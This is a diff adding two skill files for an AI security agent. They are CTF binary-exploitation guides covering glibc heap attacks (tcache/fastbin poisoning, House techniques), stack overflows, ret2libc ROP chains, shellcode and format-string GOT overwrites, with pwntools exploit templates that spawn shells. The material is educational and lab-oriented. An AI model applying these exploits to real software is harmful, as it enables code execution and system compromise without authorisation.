@aegis-scan/skills 0.5.0 → 0.5.2

package/skills/offensive/airecon-fork/ctf-heap-advanced/SKILL.md

@@ -0,0 +1,336 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+# CTF Heap Exploitation — Advanced Techniques
+
+Advanced glibc heap attacks for modern allocator (libc 2.27–2.35+). Assumes basic BOF/UAF knowledge.
+
+## Install
+
+```bash
+pip install pwntools --break-system-packages
+sudo apt-get install -y gdb gdb-peda libc6-dbg
+# pwndbg (best heap commands):
+git clone https://github.com/pwndbg/pwndbg /opt/pwndbg && cd /opt/pwndbg && ./setup.sh
+# libc version checker:
+ldd ./challenge | grep libc | awk '{print $3}' | xargs strings | grep "GNU C"
+```
+
+---
+
+## Phase 1: Libc & Heap Recon
+
+```bash
+# Get libc version — determines available attacks:
+ldd ./challenge
+strings /lib/x86_64-linux-gnu/libc.so.6 | grep "GNU C Library"
+# OR: file /lib/x86_64-linux-gnu/libc.so.6
+
+# Get libc base (if PIE off or after leak):
+python3 -c "
+from pwn import *
+elf = ELF('./challenge')
+libc = ELF('./libc.so.6')
+print(hex(libc.sym['malloc']))
+print(hex(libc.sym['__malloc_hook']))   # target for older libcs
+print(hex(libc.sym['__free_hook']))     # target for ≤ 2.33
+"
+
+# GDB heap inspection (pwndbg):
+gdb ./challenge
+heap         # show all chunks
+bins         # show all bins (tcache, fastbin, unsorted, small, large)
+chunks       # list all allocated/freed chunks
+vis_heap_chunks   # visual heap layout
+```
+
+---
+
+## Phase 2: Tcache Attacks (libc 2.27–2.34)
+
+### Tcache Poisoning (libc 2.27–2.28)
+
+```python
+# Tcache: singly-linked free list per size class, 7 entries max
+# No integrity check in 2.27 — fd pointer can be anything
+
+from pwn import *
+p = process('./challenge')
+
+# 1. Allocate and free two same-size chunks into tcache
+alloc(0x40)   # chunk A
+alloc(0x40)   # chunk B (to avoid consolidation with top)
+free(A)       # tcache[0x40]: A → NULL
+
+# 2. Overwrite fd of A (via UAF or heap overflow) to target address
+write(A, p64(target_addr))   # tcache[0x40]: A → target
+
+# 3. Allocate twice → second alloc returns target
+alloc(0x40)   # returns A
+alloc(0x40)   # returns target (e.g. __malloc_hook, __free_hook, stack)
+
+# Write shellcode/one_gadget to __free_hook:
+write(target, p64(one_gadget))
+free(any_chunk)   # triggers one_gadget → shell
+```
+
+### Tcache Dup (Double Free, libc 2.27)
+
+```python
+# libc 2.27: no double-free check in tcache
+alloc(0x40)   # chunk A
+free(A)       # tcache: A → NULL
+free(A)       # tcache: A → A (circular!) — works in 2.27
+alloc(0x40)   # returns A, tcache: A → A
+alloc(0x40)   # returns A again
+
+# libc 2.28+: key field added — bypass:
+# After first free, A->key = tcache pointer
+# Overwrite A->key (8 bytes at A+8) before second free
+write(A, p64(0) + p64(0))   # clear key
+free(A)   # second free now works
+```
+
+### Tcache Key Bypass (libc 2.29–2.34)
+
+```python
+# Overwrite the key field to bypass double-free protection
+# key = address of tcache_perthread_struct (constant per run if no ASLR)
+leak_heap_base()   # need heap address
+tcache_struct = heap_base + 0x10   # typical offset
+
+# Corrupt key field via partial overwrite (1-byte overflow):
+overflow_into_key_byte(0x00)   # zero out key → double free allowed
+```
+
+---
+
+## Phase 3: Fastbin Attacks (libc 2.23–2.26)
+
+### Fastbin Dup into Stack
+
+```python
+# fastbin: 0x20–0x80 size range, singly-linked
+# Vulnerability: double free allowed (no modern check)
+
+alloc(0x60)   # chunk A (fastbin size)
+alloc(0x60)   # chunk B
+free(A)       # fastbin: A → NULL
+free(B)       # fastbin: B → A
+free(A)       # fastbin: A → B → A (circular)
+
+alloc(0x60)   # returns A, fastbin: B → A
+alloc(0x60)   # returns B
+# Overwrite B->fd to point near stack:
+write(B, p64(stack_target - 0x8))   # fake chunk header offset
+alloc(0x60)   # returns A (fastbin: stack_target)
+alloc(0x60)   # returns stack_target → write here!
+```
+
+### Fastbin into __malloc_hook
+
+```python
+# Classic: overwrite __malloc_hook with one_gadget
+# __malloc_hook - 0x23 often has valid fake size (0x7f)
+
+libc_base = leaked_libc_addr - libc.sym['puts']
+malloc_hook = libc_base + libc.sym['__malloc_hook']
+fake_chunk = malloc_hook - 0x23   # size field at offset -3 = 0x7f (valid fast chunk for 0x70)
+
+alloc(0x60); alloc(0x60)
+free(A); free(B); free(A)
+alloc(0x60)  # A
+alloc(0x60)  # B — overwrite fd:
+write(B, p64(fake_chunk))
+alloc(0x60)  # A
+alloc(0x60)  # fake_chunk near __malloc_hook
+# Write one_gadget at __malloc_hook offset:
+write(at_fake_chunk, b'\x00'*0x13 + p64(one_gadget))
+alloc(1)     # triggers __malloc_hook → one_gadget
+```
+
+---
+
+## Phase 4: Unsorted Bin Leak (libc address)
+
+```python
+# Freed chunk > 0x80 goes to unsorted bin
+# Unsorted bin fd/bk → main_arena (+88 or +96) → libc
+
+alloc(0x100)   # chunk to leak
+alloc(0x10)    # prevent top-chunk consolidation
+free(A)        # goes to unsorted bin
+
+# Read fd of freed A:
+leak = read(A)[:8]
+libc_leak = u64(leak)
+libc_base = libc_leak - 0x3ebca0   # offset varies by libc version
+# Verify: libc_base + libc.sym['puts'] should match known puts address
+
+# Find correct offset:
+# gdb: p/x &main_arena - (void*)libc_base
+```
+
+---
+
+## Phase 5: Largebin Attack (libc 2.29+)
+
+```python
+# Largebin attack: corrupt largebin bk_nextsize → arbitrary write during malloc
+# Effect: write heap pointer to arbitrary location
+
+# 1. Free large chunk → unsorted bin
+alloc(0x440)   # L1
+alloc(0x10)    # separator
+free(L1)       # unsorted bin
+
+# 2. Trigger unsorted bin sorting (alloc smaller):
+alloc(0x430)   # L1 moves to largebin
+
+# 3. Free second large chunk (same size class):
+alloc(0x440)   # L2
+alloc(0x10)    # separator
+free(L2)       # unsorted bin
+
+# 4. Overwrite L2->bk_nextsize → target - 0x20:
+write(L2, p64(0) + p64(0) + p64(0) + p64(target - 0x20))
+
+# 5. Trigger largebin insertion:
+alloc(0x430)   # L2 sorted → writes heap+0x20 to target
+# Result: target contains heap pointer (useful for bypassing ASLR)
+```
+
+---
+
+## Phase 6: House of Techniques
+
+### House of Force (libc ≤ 2.26)
+
+```python
+# Overflow top chunk size field → malloc arbitrary address
+# top chunk size = -1 → any size alloc succeeds
+
+overflow_top_chunk_size(p64(0xffffffffffffffff))  # set size = -1
+
+# Calculate delta to target:
+target = libc_base + libc.sym['__malloc_hook']
+current_top = heap_base + known_offset
+delta = target - current_top - 0x10   # subtract chunk header
+
+alloc(delta)   # advance top chunk to target
+alloc(0x10)    # returns target → overwrite __malloc_hook
+```
+
+### House of Botcake (tcache + unsorted bin, libc 2.29+)
+
+```python
+# Bypass tcache double-free check via unsorted bin consolidation
+# Result: chunk in both tcache AND unsorted bin → overlapping allocs
+
+alloc(0x100)  # prev (P)
+alloc(0x100)  # victim (A)
+alloc(0x10)   # separator
+
+# Fill tcache for 0x100 size:
+for _ in range(7): alloc(0x100); free(last_seven)
+
+# Free P and A → A consolidates with P in unsorted bin:
+free(P); free(A)
+
+# Pop one from tcache:
+alloc(0x100)
+
+# Free A again → tcache now contains A:
+free(A)   # A is in BOTH tcache AND overlaps with P in unsorted
+
+# Alloc from unsorted bin → overlapping chunk:
+alloc(0x120)   # overlaps with A
+
+# Overwrite A->fd in tcache via overlap:
+write(overlap, p64(target))
+alloc(0x100)   # drains tcache slot A
+alloc(0x100)   # returns target
+```
+
+### House of Orange (old, libc ≤ 2.25)
+
+```python
+# Corrupt top chunk size → malloc triggers sysmalloc → _IO_flush_all_lockp
+# Requires: overflow to top chunk size, heap addr, libc addr
+# No free needed — useful when no explicit free primitive
+
+# Set top chunk size to 0xc01 (valid, smaller than current brk):
+overflow_top_chunk(p64(0xc01))
+alloc(0x1000)   # triggers sysmalloc → old top goes to unsorted bin
+
+# Craft fake _IO_FILE structure in unsorted bin chunk:
+# → overwrite _IO_list_all → _IO_flush → system("/bin/sh")
+```
+
+---
+
+## Phase 7: GDB Heap Commands (pwndbg)
+
+```bash
+gdb ./challenge
+run
+
+# Heap inspection:
+heap             # all chunks with sizes and status
+bins             # tcache, fastbin, unsorted, small, large bins
+vis_heap_chunks  # color-coded visual map
+chunks 10        # last 10 chunks
+
+# Find specific chunk:
+malloc_chunk <addr>     # parse chunk header at address
+
+# Tcache state:
+tcache           # show tcache entries per size
+p tcache_perthread_struct
+
+# One-gadget finder:
+one_gadget /lib/x86_64-linux-gnu/libc.so.6  # install: gem install one_gadget
+```
+
+---
+
+## Phase 8: Libc Version Fingerprinting
+
+```bash
+# From challenge binary:
+ldd ./challenge   # shows libc path
+
+# From leak — search online:
+# https://libc.blukat.me — paste leaked addresses
+python3 -c "
+from pwn import *
+# After leaking puts address:
+# libc = LibcSearcher('puts', puts_leak)
+# libc_base = puts_leak - libc.dump('puts')
+"
+
+# Manual: check glibc symbol offsets:
+python3 -c "
+from pwn import *
+libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
+print(hex(libc.sym['system']))
+print(hex(libc.sym['__free_hook']))
+print(hex(libc.sym['__malloc_hook']))
+print(hex(next(libc.search(b'/bin/sh'))))
+"
+```
+
+---
+
+## Pro Tips
+
+1. **Always check libc version first** — attacks differ dramatically between 2.27/2.29/2.31/2.34/2.35
+2. **libc 2.34+**: `__malloc_hook` and `__free_hook` removed → use `__libc_system` overwrite via `exit` hooks or `IO_FILE` attack
+3. **tcache count** — tcache holds max 7 per size; 8th free goes to fastbin/unsorted
+4. **Heap leak**: allocate large chunk, free it, read first 8 bytes → libc main_arena pointer
+5. **one_gadget** — `one_gadget libc.so.6` finds single-gadget RCE (no args needed)
+6. **GLIBC safe-linking (2.32+)**: tcache fd = `(addr >> 12) XOR next` — deobfuscate with known heap bits
+7. Heap base usually ends in `000` — single nibble brute force for partial overwrites
+
+## Summary
+
+Heap exploit flow: `checksec` → `ldd` for libc version → `gdb` with `pwndbg` → `heap/bins` to understand layout → identify primitive (UAF/overflow/double-free) → pick attack based on libc version → leak libc → overwrite hook/exit/IO_FILE → shell.

package/skills/offensive/airecon-fork/ctf-pwn/SKILL.md

@@ -0,0 +1,294 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+
+---
+name: ctf-pwn
+description: CTF binary exploitation — buffer overflow, format string, ROP chains, ret2libc, heap exploitation, shellcode, using pwntools and GDB with PEDA/pwndbg in Docker Kali Linux
+---
+
+# CTF Binary Exploitation (PWN)
+
+PWN = find memory corruption → control instruction pointer → execute shellcode or ROP chain.
+
+## AIRecon Docker Constraints (Headless Only)
+
+- AIRecon executes through Docker engine and terminal tools only.
+- Avoid GUI-dependent debuggers and RE suites:
+  - no IDA GUI, no Ghidra UI, no x64dbg, no visual exploit IDE workflows.
+- Prefer deterministic CLI pipeline:
+  - `checksec`, `file`, `nm`, `objdump`, `readelf`, `ROPgadget`, `gdb` batch, `pwntools`.
+- Keep exploitation reproducible:
+  - write exploit scripts to `output/` or `tools/`,
+  - run them via `execute`,
+  - store proof outputs in files so the agent can reason across iterations.
+- If an approach needs manual GUI interaction, replace it with scriptable equivalent before proceeding.
+
+**Install:**
+```
+pip install pwntools --break-system-packages
+sudo apt-get install -y gdb gdb-peda radare2 checksec binutils ltrace strace
+# pwndbg: git clone https://github.com/pwndbg/pwndbg /home/pentester/tools/pwndbg && cd /home/pentester/tools/pwndbg && ./setup.sh
+# PEDA: git clone https://github.com/longld/peda /home/pentester/tools/peda && echo "source /home/pentester/tools/peda/peda.py" >> ~/.gdbinit
+sudo apt-get install -y python3-pwntools
+```
+
+---
+
+## Binary Analysis First
+
+    # Check protections:
+    checksec --file=./vuln
+    # Output: RELRO, Stack Canary, NX, PIE, ASLR
+    # NX=No Execute (stack shellcode won't work)
+    # PIE=Position Independent Executable (ASLR on binary itself)
+    # Canary=Stack cookie (BOF must leak/bypass)
+
+    # Find file type:
+    file ./vuln
+    # ELF 64-bit / 32-bit, dynamically/statically linked
+
+    # Strings — find hardcoded flags, passwords, format strings:
+    strings ./vuln
+    strings -n 6 ./vuln | grep -i "flag\|pass\|key\|secret"
+
+    # Symbols and functions:
+    nm ./vuln | grep -i "func\|main\|win\|shell"
+    objdump -d ./vuln | grep -A5 "win\|shell\|system"
+
+    # Dynamic analysis — trace syscalls and library calls:
+    strace ./vuln                    # syscalls
+    ltrace ./vuln                    # library calls (libc functions)
+
+---
+
+## GDB with PEDA/pwndbg
+
+    gdb ./vuln
+
+    # Basic commands:
+    run                              # Start program
+    run < <(python3 -c "print('A'*100)")   # With input
+    break main                       # Breakpoint at main
+    break *0x4011a3                  # Breakpoint at address
+    info functions                   # List all functions
+    info registers                   # Register state
+    x/20wx $esp                      # Examine 20 words at ESP (32-bit)
+    x/20gx $rsp                      # Examine 20 qwords at RSP (64-bit)
+    x/s 0x4020a0                     # Examine string at address
+    disassemble main                 # Disassemble function
+    p system                         # Print address of system()
+    p puts                           # Print address of puts()
+    find &system, +9999999, "/bin/sh" # Find "/bin/sh" string
+
+    # PEDA shortcuts:
+    pattern create 200               # Create cyclic pattern
+    pattern offset <value>           # Find offset from crashed EIP/RIP
+    checksec                         # Security of current binary
+    ropgadget                        # Find ROP gadgets
+
+    # pwndbg shortcuts:
+    cyclic 200                       # Cyclic pattern
+    cyclic -l <value>                # Find offset
+    vmmap                            # Memory map
+    got                              # Global Offset Table
+
+---
+
+## Stack Buffer Overflow (BOF)
+
+### Find Offset
+
+    # Method 1: cyclic pattern (pwntools)
+    python3 -c "from pwn import *; print(cyclic(200).decode())" | ./vuln
+    # Read crashed EIP/RIP value, then:
+    python3 -c "from pwn import *; print(cyclic_find(0x<crashed_value>))"
+
+    # Method 2: binary search manually
+    python3 -c "print('A'*100 + 'B'*4 + 'C'*100)" | ./vuln  # EIP=BBBB?
+
+### Basic BOF — No Protections (no NX, no canary, no PIE)
+
+    # shellcode = execve("/bin/sh") for x86-64:
+    python3 -c "
+    from pwn import *
+    context.arch = 'amd64'  # or 'i386' for 32-bit
+    p = process('./vuln')
+    offset = 40            # adjust per cyclic
+    shellcode = asm(shellcraft.sh())
+    payload = shellcode + b'A' * (offset - len(shellcode)) + p64(0x<stack_address>)
+    p.sendline(payload)
+    p.interactive()
+    "
+
+### ret2win — function that calls system("/bin/sh") or prints flag
+
+    python3 -c "
+    from pwn import *
+    p = process('./vuln')
+    win_addr = 0x4011b6   # address of win() function (from nm or objdump)
+    offset = 40
+    payload = b'A' * offset + p64(win_addr)  # p32() for 32-bit
+    p.sendline(payload)
+    p.interactive()
+    "
+
+### ret2libc — NX enabled, no PIE, no canary
+
+    python3 -c "
+    from pwn import *
+    elf = ELF('./vuln')
+    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
+    p = process('./vuln')
+
+    # Step 1: Leak libc address via puts@plt -> puts@got
+    pop_rdi = 0x<rop_gadget_pop_rdi_ret>   # find with: ROPgadget --binary ./vuln | grep 'pop rdi'
+    puts_plt = elf.plt['puts']
+    puts_got = elf.got['puts']
+    main = elf.sym['main']
+
+    payload  = b'A' * <offset>
+    payload += p64(pop_rdi)
+    payload += p64(puts_got)
+    payload += p64(puts_plt)
+    payload += p64(main)    # return to main for round 2
+    p.sendline(payload)
+
+    # Step 2: Calculate libc base from leaked puts address
+    leak = u64(p.recvuntil(b'\n')[:-1].ljust(8, b'\x00'))
+    libc.address = leak - libc.sym['puts']
+    print(f'libc base: {hex(libc.address)}')
+
+    # Step 3: Call system('/bin/sh')
+    ret_gadget = 0x<ret_gadget>   # ROPgadget --binary ./vuln | grep ': ret$'
+    payload2  = b'A' * <offset>
+    payload2 += p64(ret_gadget)   # stack alignment for x86-64
+    payload2 += p64(pop_rdi)
+    payload2 += p64(next(libc.search(b'/bin/sh')))
+    payload2 += p64(libc.sym['system'])
+    p.sendline(payload2)
+    p.interactive()
+    "
+
+---
+
+## ROP Chain
+
+    # Find gadgets:
+    ROPgadget --binary ./vuln | grep "pop rdi"
+    ROPgadget --binary ./vuln | grep ": ret$"
+    ROPgadget --binary ./vuln --rop   # automated ROP chain suggestion
+
+    # ropper (alternative):
+    sudo apt-get install -y ropper
+    ropper -f ./vuln --search "pop rdi"
+
+---
+
+## Format String Vulnerability
+
+    # Detect: input '%x.%x.%x' → if output shows hex values = vulnerable
+    printf '%x.%x.%x.%x.%x' | ./vuln
+
+    # Find offset (which positional arg contains your input):
+    python3 -c "print('AAAA' + '.%x' * 20)" | ./vuln
+    # Find where 41414141 appears → that's your offset (e.g., position 6)
+
+    # Leak arbitrary address value:
+    python3 -c "
+    from pwn import *
+    p = process('./vuln')
+    target_addr = 0x<address_to_read>
+    payload = p32(target_addr) + b'.%6\$s'   # position 6 = your offset
+    p.sendline(payload)
+    p.interactive()
+    "
+
+    # Overwrite arbitrary address (GOT overwrite):
+    python3 -c "
+    from pwn import *
+    p = process('./vuln')
+    got_exit = 0x<exit_got_address>
+    win = 0x<win_function_address>
+    # Build format string write: writes win address to exit@GOT
+    payload = fmtstr_payload(6, {got_exit: win})  # offset=6
+    p.sendline(payload)
+    p.interactive()
+    "
+
+---
+
+## Remote Exploitation
+
+    python3 -c "
+    from pwn import *
+    # Switch between local and remote:
+    # p = process('./vuln')
+    p = remote('target.ctf', 1337)
+    # ... rest of exploit ...
+    "
+
+---
+
+## Quick Exploit Template (pwntools)
+
+    # tools/pwn_exploit.py
+    from pwn import *
+
+    context.log_level = 'info'
+    context.arch = 'amd64'   # i386 for 32-bit
+
+    elf = ELF('./vuln')
+    libc = ELF('./libc.so.6')  # if provided
+
+    # p = process('./vuln')
+    # p = remote('host', port)
+    p = gdb.debug('./vuln', '''
+    break main
+    continue
+    ''')
+
+    offset = cyclic_find(0xdeadbeef)   # replace with actual crash value
+
+    # Build payload
+    payload = flat(
+        b'A' * offset,
+        p64(0x<address>),
+    )
+
+    p.sendlineafter(b'> ', payload)
+    p.interactive()
+
+---
+
+## Heap Exploitation (tcache/fastbin — libc 2.27+)
+
+    # Use-After-Free:
+    # Allocate chunk → free → use dangling pointer → control next allocation
+
+    # Double Free (tcache < 2.29):
+    # free(chunk) → free(chunk) again → tcache corrupted → arbitrary alloc
+
+    # Heap address leak: unsorted bin → fd points to main_arena in libc
+
+    # Tools:
+    # heapinspect: pip install heapinspect --break-system-packages
+    # pwndbg: heap, bins, chunks commands in GDB
+
+---
+
+## Pro Tips
+
+1. Always run `checksec` first — protections determine attack path
+2. NX off + no canary = shellcode on stack (simplest)
+3. NX on + no PIE = ret2libc with hardcoded PLT/GOT
+4. NX on + PIE + canary = need info leak first (format string or controlled read)
+5. For remote: leak libc → calculate base → call system('/bin/sh')
+6. `ROPgadget --binary ./vuln --rop` generates automatic chain suggestions
+7. Stack alignment: x86-64 requires 16-byte aligned stack before `call system` → add `ret` gadget
+
+## Summary
+
+PWN flow: `checksec` → `strings` → `gdb` with `cyclic` to find offset → choose attack based on protections:
+- No NX: shellcode → ret to stack
+- NX, no PIE: ret2win or ret2libc (fixed addresses)
+- NX + PIE: leak address → calculate base → ret2libc
+- Format string: leak via `%x` chain → write via `fmtstr_payload`